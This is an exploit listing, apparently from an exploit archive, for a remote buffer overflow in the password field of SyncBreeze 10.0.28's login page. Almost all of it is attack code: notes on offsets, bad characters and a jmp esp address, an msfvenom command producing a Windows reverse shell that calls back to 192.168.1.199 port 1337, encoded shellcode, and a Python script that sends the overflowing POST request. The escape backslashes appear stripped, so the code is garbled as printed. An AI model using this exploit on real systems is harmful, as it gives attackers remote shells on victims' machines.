Authored by Abdessalam King

SyncBreeze version 10.0.28 suffers from a remote buffer overflow vulnerability.

# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow
# Date: 18-Sep-2020
# Exploit Author: Abdessalam king(A.salam)
# Vendor Homepage: http://www.syncbreeze.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
# Version: 10.0.28
# Tested on: Windows 7,windows xp,windows 10
#72413372 [*] Exact match at offset 520
#jmp esp FFE4 xffxe4
#!mona modules
#!mona find -s "xffxe4" -m libspp.dll
#address esp => 10090C83
#badchars ==> "x00x0ax0dx25x26x2bx3d"
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c
-b "x00x0ax0dx25x26x2bx3d"  EXITFUNC=thread
#!/usr/bin/python
import socket

shell =""
shell +="xbax4bx38x98x39xddxc7xd9x74x24xf4x5fx33xc9xb1"
shell +="x53x83xefxfcx31x57x10x03x57x10xa9xcdx64xd1xaf"
shell +="x2ex95x22xcfxa7x70x13xcfxdcxf1x04xffx97x54xa9"
shell +="x74xf5x4cx3axf8xd2x63x8bxb6x04x4dx0cxeax75xcc"
shell +="x8exf0xa9x2exaex3bxbcx2fxf7x21x4dx7dxa0x2exe0"
shell +="x92xc5x7ax39x18x95x6bx39xfdx6ex8ax68x50xe4xd5"
shell +="xaax52x29x6exe3x4cx2ex4axbdxe7x84x21x3cx2exd5"
shell +="xcax93x0fxd9x39xedx48xdexa1x98xa0x1cx5cx9bx76"
shell +="x5exbax2ex6dxf8x49x88x49xf8x9ex4fx19xf6x6bx1b"
shell +="x45x1bx6axc8xfdx27xe7xefxd1xa1xb3xcbxf5xeax60"
shell +="x75xafx56xc7x8axafx38xb8x2exbbxd5xadx42xe6xb1"
shell +="x02x6fx19x42x0cxf8x6ax70x93x52xe5x38x5cx7dxf2"
shell +="x3fx77x39x6cxbex77x3axa4x05x23x6axdexacx4bxe1"
shell +="x1ex50x9ex9cx15xf7x70x83xd7x6dx71x29x2ax1ax9b"
shell +="xa2xf5x3axa4x68x9exd3x58x93xbexb3xd5x75xaaxa3"
shell +="xb3x2ex43x06xe0xe6xf4x79xc3x8cx3bxf0xb3xd9xd3"
shell +="x4cxaaxdexdcx4cxf9x48x4bxc7xedx4cx6axd8x38xe5"
shell +="xfbx4fxb7x64x49xf1xc8xacx3bxf1x5cx4bxeaxa6xc8"
shell +="x51xcbx81x57xa9x3ex92x9fx55xbfxb8xd4x60x55x83"
shell +="x82x8cxb9x03x52xdbxd3x03x3axbbx87x57x5fxc4x1d"
shell +="xc4xccx51x9exbdxa1xf2xf6x43x9cx35x59xbbxcbx45"
shell +="x9ex43x8dx4ex5ex87x58x97x15xeex59xacx36xedx77"
shell +="xd9xdexa8x12x60x83x4axc9xa7xbaxc8xfbx57x39xd0"
shell +="x8ex52x05x56x63x2fx16x33x83x9cx17x16";


payload = "username=AAAAA&password="+"A"*520+"x83x0cx09x10"+ "x90" *
20 + shell +"x90"*(1400-520-4-20-len(shell))
req =""
req += "POST /login HTTP/1.1rn"
req += "Host: 192.168.1.20rn"
req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0rn"
req += "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
req += "Accept-Language: en-US,en;q=0.5rn"
req += "Accept-Encoding: gzip, deflatern"
req += "Referer: http://192.168.1.20/loginrn"
req += "Content-Type: application/x-www-form-urlencodedrn"
req += "Content-Length: "+str(len(payload))+"rn"
req += "Connection: keep-alivern"
req += "Upgrade-Insecure-Requests: 1rn"
req += "rn"
req += payload
# print req
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.20",80))
s.send(req)
print s.recv(1024)

s.close()

RELATED ARTICLESMORE FROM AUTHOR